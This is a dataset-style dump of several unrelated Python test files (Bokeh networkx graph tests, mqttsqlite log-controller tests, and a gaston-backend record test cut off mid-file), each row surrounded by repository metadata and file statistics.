| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bce50394f4967df79059e46b924c303b35172e4e
| 7,785
|
py
|
Python
|
tests/unit/bokeh/plotting/test_graph.py
|
samwill/bokeh
|
228132eba4b696b91b2a77f7e9d07771ba868093
|
[
"BSD-3-Clause"
] | 1
|
2021-05-03T15:19:05.000Z
|
2021-05-03T15:19:05.000Z
|
tests/unit/bokeh/plotting/test_graph.py
|
samwill/bokeh
|
228132eba4b696b91b2a77f7e9d07771ba868093
|
[
"BSD-3-Clause"
] | 3
|
2021-09-08T03:16:42.000Z
|
2022-03-12T00:57:18.000Z
|
tests/unit/bokeh/plotting/test_graph.py
|
samwill/bokeh
|
228132eba4b696b91b2a77f7e9d07771ba868093
|
[
"BSD-3-Clause"
] | 2
|
2021-01-12T18:22:24.000Z
|
2021-10-30T00:32:02.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
import networkx as nx
import numpy as np
from numpy.testing import assert_allclose
# Module under test
import bokeh.plotting.graph as bpg # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_from_networkx_method() -> None:
G=nx.Graph()
G.add_nodes_from([0,1,2,3])
G.add_edges_from([[0,1], [0,2], [2,3]])
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0,1,2,3]
assert renderer.edge_renderer.data_source.data["start"] == [0,0,2]
assert renderer.edge_renderer.data_source.data["end"] == [1,2,3]
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1, 2, 3}
assert_allclose(gl[0], np.array([1.0, 0.0]), atol=1e-7)
def test_from_networkx_method_with_kwargs() -> None:
G=nx.Graph()
G.add_nodes_from([0,1,2,3])
G.add_edges_from([[0,1], [0,2], [2,3]])
renderer = bpg.from_networkx(G, nx.circular_layout, scale=2)
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1, 2, 3}
assert_allclose(gl[0], np.array([2.0, 0.0]), atol=1e-7)
def test_from_networkx_with_scalar_attributes() -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"attr_1": "a", "attr_2": 10}),
(1, {"attr_1": "b"}),
(2, {"attr_1": "c", "attr_2": 30})])
G.add_edges_from([(0, 1, {"attr_1": "A"}),
(0, 2, {"attr_1": "B", "attr_2": 10})])
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1, 2]
assert renderer.node_renderer.data_source.data["attr_1"] == ["a", "b", "c"]
assert renderer.node_renderer.data_source.data["attr_2"] == [10, None, 30]
assert renderer.edge_renderer.data_source.data["start"] == [0, 0]
assert renderer.edge_renderer.data_source.data["end"] == [1, 2]
assert renderer.edge_renderer.data_source.data["attr_1"] == ["A", "B"]
assert renderer.edge_renderer.data_source.data["attr_2"] == [None, 10]
@pytest.mark.parametrize('typ', [list, tuple])
def test_from_networkx_with_sequence_attributes(typ) -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"attr_1": typ([1, 2]), "attr_2": 10}),
(1, {}),
(2, {"attr_1": typ([3]), "attr_2": 30})])
G.add_edges_from([(0, 1, {"attr_1": typ([1, 11])}),
(0, 2, {"attr_1": typ([2, 22]), "attr_2": 10})])
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1, 2]
assert renderer.node_renderer.data_source.data["attr_1"] == [[1, 2], [], [3]]
assert renderer.node_renderer.data_source.data["attr_2"] == [10, None, 30]
assert renderer.edge_renderer.data_source.data["start"] == [0, 0]
assert renderer.edge_renderer.data_source.data["end"] == [1, 2]
assert renderer.edge_renderer.data_source.data["attr_1"] == [[1, 11], [2, 22]]
assert renderer.edge_renderer.data_source.data["attr_2"] == [None, 10]
def test_from_networkx_errors_with_mixed_attributes() -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"attr_1": [1, 2], "attr_2": 10}),
(1, {}),
(2, {"attr_1": 3, "attr_2": 30})])
with pytest.raises(ValueError):
bpg.from_networkx(G, nx.circular_layout)
G = nx.Graph()
G.add_edges_from([(0, 1, {"attr_1": [1, 11]}),
(0, 2, {"attr_1": 2, "attr_2": 10})])
with pytest.raises(ValueError):
bpg.from_networkx(G, nx.circular_layout)
def test_from_networkx_with_bad_attributes() -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"index": "a", "attr_1": 10}),
(1, {"index": "b", "attr_1": 20})])
G.add_edges_from([[0, 1]])
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1]
assert renderer.node_renderer.data_source.data["attr_1"] == [10, 20]
G = nx.Graph()
G.add_nodes_from([0, 1])
G.add_edges_from([(0, 1, {"start": "A", "attr_1": 10})])
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.edge_renderer.data_source.data["start"] == [0]
assert renderer.edge_renderer.data_source.data["end"] == [1]
assert renderer.edge_renderer.data_source.data["attr_1"] == [10]
G = nx.Graph()
G.add_nodes_from([0, 1])
G.add_edges_from([(0, 1, {"end": "A", "attr_1": 10})])
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.edge_renderer.data_source.data["start"] == [0]
assert renderer.edge_renderer.data_source.data["end"] == [1]
assert renderer.edge_renderer.data_source.data["attr_1"] == [10]
def test_from_networkx_fixed_layout() -> None:
G = nx.Graph()
G.add_nodes_from([0, 1, 2])
G.add_edges_from([[0, 1], [0, 2]])
fixed_layout = {0: [0, 1],
1: [-1, 0],
2: [1, 0]}
renderer = bpg.from_networkx(G, fixed_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1, 2]
assert renderer.edge_renderer.data_source.data["start"] == [0, 0]
assert renderer.edge_renderer.data_source.data["end"] == [1, 2]
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1, 2}
assert renderer.layout_provider.graph_layout[0] == fixed_layout[0]
assert renderer.layout_provider.graph_layout[1] == fixed_layout[1]
assert renderer.layout_provider.graph_layout[2] == fixed_layout[2]
def test_from_networkx_with_missing_layout() -> None:
G = nx.Graph()
G.add_nodes_from([0, 1, 2])
G.add_edges_from([[0, 1], [0, 2]])
missing_fixed_layout = {0: [0, 1],
1: [-1, 0]}
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, missing_fixed_layout)
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1}
assert renderer.layout_provider.graph_layout[0] == missing_fixed_layout[0]
assert renderer.layout_provider.graph_layout[1] == missing_fixed_layout[1]
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
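For context, a renderer returned by from_networkx is normally attached to a Bokeh figure. A minimal usage sketch (not part of the test module above, reusing the same graph construction the tests use; the plot ranges are arbitrary assumptions) might look like this.
import networkx as nx
from bokeh.plotting import figure

import bokeh.plotting.graph as bpg

G = nx.Graph()
G.add_nodes_from([0, 1, 2, 3])
G.add_edges_from([[0, 1], [0, 2], [2, 3]])

# Build the graph renderer and add it to a plot.
plot = figure(x_range=(-2, 2), y_range=(-2, 2))
plot.renderers.append(bpg.from_networkx(G, nx.circular_layout, scale=1.8))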
| 40.546875
| 82
| 0.521516
| 969
| 7,785
| 3.957688
| 0.110423
| 0.120469
| 0.131421
| 0.160626
| 0.837027
| 0.788787
| 0.779661
| 0.747327
| 0.731943
| 0.698827
| 0
| 0.042286
| 0.170713
| 7,785
| 191
| 83
| 40.759162
| 0.551735
| 0.193449
| 0
| 0.516667
| 0
| 0
| 0.052808
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.066667
| false
| 0
| 0.041667
| 0
| 0.108333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcf5ffcfdeb94429ea3d58dd16faadca39d534cf
| 20,280
|
py
|
Python
|
tests/test_logs.py
|
poleguy/mqttSqlLite
|
3041e01a05639274621767dcdbe16035657b1bc5
|
[
"MIT"
] | 14
|
2017-08-29T02:51:19.000Z
|
2021-08-19T01:25:52.000Z
|
tests/test_logs.py
|
poleguy/mqttSqlLite
|
3041e01a05639274621767dcdbe16035657b1bc5
|
[
"MIT"
] | 1
|
2020-05-05T10:05:21.000Z
|
2020-05-06T12:40:57.000Z
|
tests/test_logs.py
|
poleguy/mqttSqlLite
|
3041e01a05639274621767dcdbe16035657b1bc5
|
[
"MIT"
] | 5
|
2019-10-29T00:49:24.000Z
|
2021-03-19T16:37:30.000Z
|
import unittest
from playhouse.test_utils import test_database
from peewee import *
from datetime import datetime, timedelta
from mqttsqlite.orm.models import Log, Topic
from tests.utils import msg
from mqttsqlite.core.logs_controller import LogController
import mqttsqlite.settings.private_settings as Settings
import json
test_db = SqliteDatabase('test_database.db')
class TestLogsController(unittest.TestCase):
def setUp(self):
self.payload = {}
self.payload['client'] = 'testClient'
self.payload['password'] = Settings.QUERY_PASSWORD
self.payload['topic'] = '/test/topic'
self.payload['options'] = '25'
self.msg = msg(topic=Settings.ROOT_TOPIC + '/topics/add', payload=json.dumps(self.payload))
def test_add_log_entry_response_ok(self):
message = msg(topic='/test/home/sensor', payload='123445')
with test_database(test_db, (Log, Topic), create_tables=True):
logs = LogController()
result = logs.add_entry(message)
parsedResponse = json.loads(result)
self.assertEqual('OK', parsedResponse['result'])
def test_add_log_entry(self):
with test_database(test_db, (Log, Topic), create_tables=True):
message = msg(topic='/test/home/sensor', payload='123445')
logs = LogController()
result = logs.add_entry(message)
parsedResponse = json.loads(result)
self.assertEqual('OK', parsedResponse['result'])
self.assertEqual(1, Log.select().count())
def test_private_method_get_log_newer_than(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=60), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=50), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=40), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_logs_newer_than('/test/topic', 25)
self.assertEqual(2, len(query_result))
def test_private_method_get_log_from_desired_topic_newer_than(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_logs_newer_than('/test/topic', 25)
self.assertEqual(2, len(query_result))
def test_private_method_get_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
Log.create(timestamp=datetime.now(), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now(), value="12", topic='/test/topic3')
logs = LogController()
query_result = logs._LogController__get_last_entry_from_topic('/test/topic')
self.assertEqual(timestamp.strftime("%Y-%m-%d %H:%M:%S"), query_result['timestamp'])
def test_private_method_get_last_entry_from_invalid_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_last_entry_from_topic('/test/topic3')
self.assertEqual({}, query_result)
def test_private_method_get_last_entry_from_topic_two_topics(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_last_entry_from_topic('/test/topic')
self.assertEqual(timestamp.strftime("%Y-%m-%d %H:%M:%S"), query_result['timestamp'])
def test_get_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/last'
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(timestamp.strftime("%Y-%m-%d %H:%M:%S"), dic_result['values'][0]['timestamp'])
def test_get_entries_newer_than_25_minutes(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/minutes'
Log.create(timestamp=datetime.now() - timedelta(minutes=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(minutes=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(2, len(dic_result['values']))
def test_get_entries_newer_than_25_hours(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/hours'
Log.create(timestamp=datetime.now() - timedelta(hours=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(hours=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(2, len(dic_result['values']))
def test_get_entries_newer_than_25_days(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(2, len(dic_result['values']))
def test_get_entries_newer_than_25_days_invalid_password(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
self.payload['password'] = 'badPassword'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('KO', dic_result['result'])
self.assertFalse('values' in dic_result)
def test_get_entries_newer_than_25_days_invalid_options(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
self.payload['options'] = 'invalidOptions'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('KO', dic_result['result'])
self.assertFalse('values' in dic_result)
def test_get_entries_newer_than_25_days_invalid_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
self.payload['topic'] = '/test/invalid/topic'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('OK', dic_result['result'])
self.assertFalse('values' in dic_result)
def test_private_method_delete_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_last_entry_from_topic('/test/topic')
self.assertTrue(result)
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_private_method_delete_last_entry_from_non_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_last_entry_from_topic('/test/topic2')
self.assertTrue(result)
data_after_delete = Log.select()
self.assertEqual(3, data_after_delete.count())
def test_private_method_delete_entries_older_than_from_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=50), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=40), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_entries_from_topic_older_than('/test/topic', 25)
self.assertEqual(3, result)
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_private_method_delete_entries_older_than_from_non_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=50), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=40), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_entries_from_topic_older_than('/test/topic2', 25)
self.assertEqual('0', result)
data_after_delete = Log.select()
self.assertEqual(5, data_after_delete.count())
def test_delete_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/last'
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertTrue(dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_minutes_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/minutes'
Log.create(timestamp=datetime.now() - timedelta(minutes=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(1, dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_hours_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/hours'
Log.create(timestamp=datetime.now() - timedelta(hours=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(1, dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_days_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/days'
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(1, dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_days_from_non_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/days'
self.payload['topic'] = '/test/invalid/topic'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('0', dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(3, data_after_delete.count())
def test_delete_older_than_x_invalid_unit_time_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/years'
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('KO', dic_result['result'])
if __name__ == '__main__':
unittest.main()
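The msg helper imported from tests.utils is not shown in this file; the tests only rely on an object with mutable topic and payload attributes, mirroring a paho-mqtt message. A plausible sketch, offered as an assumption rather than the project's actual helper, is:
class msg:
    """Hypothetical stand-in for the tests.utils.msg helper used above."""

    def __init__(self, topic='', payload=''):
        self.topic = topic
        self.payload = payload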
| 63.17757
| 107
| 0.649556
| 2,491
| 20,280
| 5.101967
| 0.047371
| 0.067983
| 0.121803
| 0.10827
| 0.939098
| 0.931781
| 0.927768
| 0.923047
| 0.908883
| 0.907074
| 0
| 0.024958
| 0.201824
| 20,280
| 320
| 108
| 63.375
| 0.760178
| 0
| 0
| 0.758621
| 0
| 0
| 0.088515
| 0
| 0
| 0
| 0
| 0
| 0.127586
| 1
| 0.086207
| false
| 0.010345
| 0.031034
| 0
| 0.12069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcf8290baccdc77a13495b58d0e847598e72ca32
| 78
|
py
|
Python
|
function/python_3_9/src/error/__init__.py
|
aws-samples/amazon-s3-object-lambda-default-configuration
|
3908515d48d5e42fd9bb6dadc1dc9fe5132a1425
|
[
"MIT-0"
] | 13
|
2021-11-23T17:07:13.000Z
|
2022-03-08T16:57:45.000Z
|
function/python_3_9/src/error/__init__.py
|
aws-samples/amazon-s3-object-lambda-default-configuration
|
3908515d48d5e42fd9bb6dadc1dc9fe5132a1425
|
[
"MIT-0"
] | 1
|
2022-01-13T14:29:52.000Z
|
2022-01-13T14:29:52.000Z
|
function/python_3_9/src/error/__init__.py
|
aws-samples/amazon-s3-object-lambda-default-configuration
|
3908515d48d5e42fd9bb6dadc1dc9fe5132a1425
|
[
"MIT-0"
] | null | null | null |
from .error_response import write_error_response_for_s3, write_error_response
| 39
| 77
| 0.910256
| 12
| 78
| 5.333333
| 0.583333
| 0.609375
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.064103
| 78
| 1
| 78
| 78
| 0.863014
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4c58e99e6876b8e962fa34a416141a5b3a365cfe
| 12,124
|
py
|
Python
|
tests/test_record.py
|
ramomar/gaston-backend
|
1b73b475478fdecf424e2d5f21fe4eb4472eb587
|
[
"MIT"
] | null | null | null |
tests/test_record.py
|
ramomar/gaston-backend
|
1b73b475478fdecf424e2d5f21fe4eb4472eb587
|
[
"MIT"
] | null | null | null |
tests/test_record.py
|
ramomar/gaston-backend
|
1b73b475478fdecf424e2d5f21fe4eb4472eb587
|
[
"MIT"
] | null | null | null |
import json
import uuid
from decimal import Decimal
from functions import record
def test_get_records_empty():
"""it should return an empty list when there are no records"""
event = {}
actual = record.get_records(event, context=None)
expected_body = {
'records': [],
'nextPage': None,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4),
}
assert actual == expected
def test_get_records(gaston_table):
"""it should return a list of records"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item = {
'owner_id': 'ramomar',
'record_id': str(uuid.uuid4()),
'note': record_raw['note'],
'amount': Decimal(record_raw['amount']),
'date': record_raw['operation_date'],
'raw': json.dumps(record_raw, default=str),
'origin': 'BANORTE_EMAIL_SES',
}
gaston_table.put_item(Item=item)
event = {}
actual = record.get_records(event, context=None)
expected_body = {
'records': [
item,
],
'nextPage': None,
}
expected = {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
},
'body': json.dumps(expected_body, indent=4, default=str)
}
assert actual['statusCode'] == expected['statusCode']
assert actual['headers'] == expected['headers']
assert json.loads(actual['body']) == json.loads(expected['body'])
def test_paginate_records(gaston_table):
"""it should paginate records"""
record_raw = {
'source': 'FAST_TRANSFER_EMAIL',
'type': 'EXPENSE',
'note': 'Transferencias Rápidas | P',
'amount': '650',
'operation_date': '27/Jul/2020 18:56:55 horas',
'application_date': None,
'receiver': {
'name': 'No capturado',
'bank': 'BANCO'
},
'channel': None,
'extra_amounts': [
{
'name': 'fee',
'amount': '3.00',
'tax': '0.48',
}
],
}
item = {
'owner_id': 'ramomar',
'record_id': '5f018b3d-e50e-44c9-a540-1717e00f09ba',
'note': record_raw['note'],
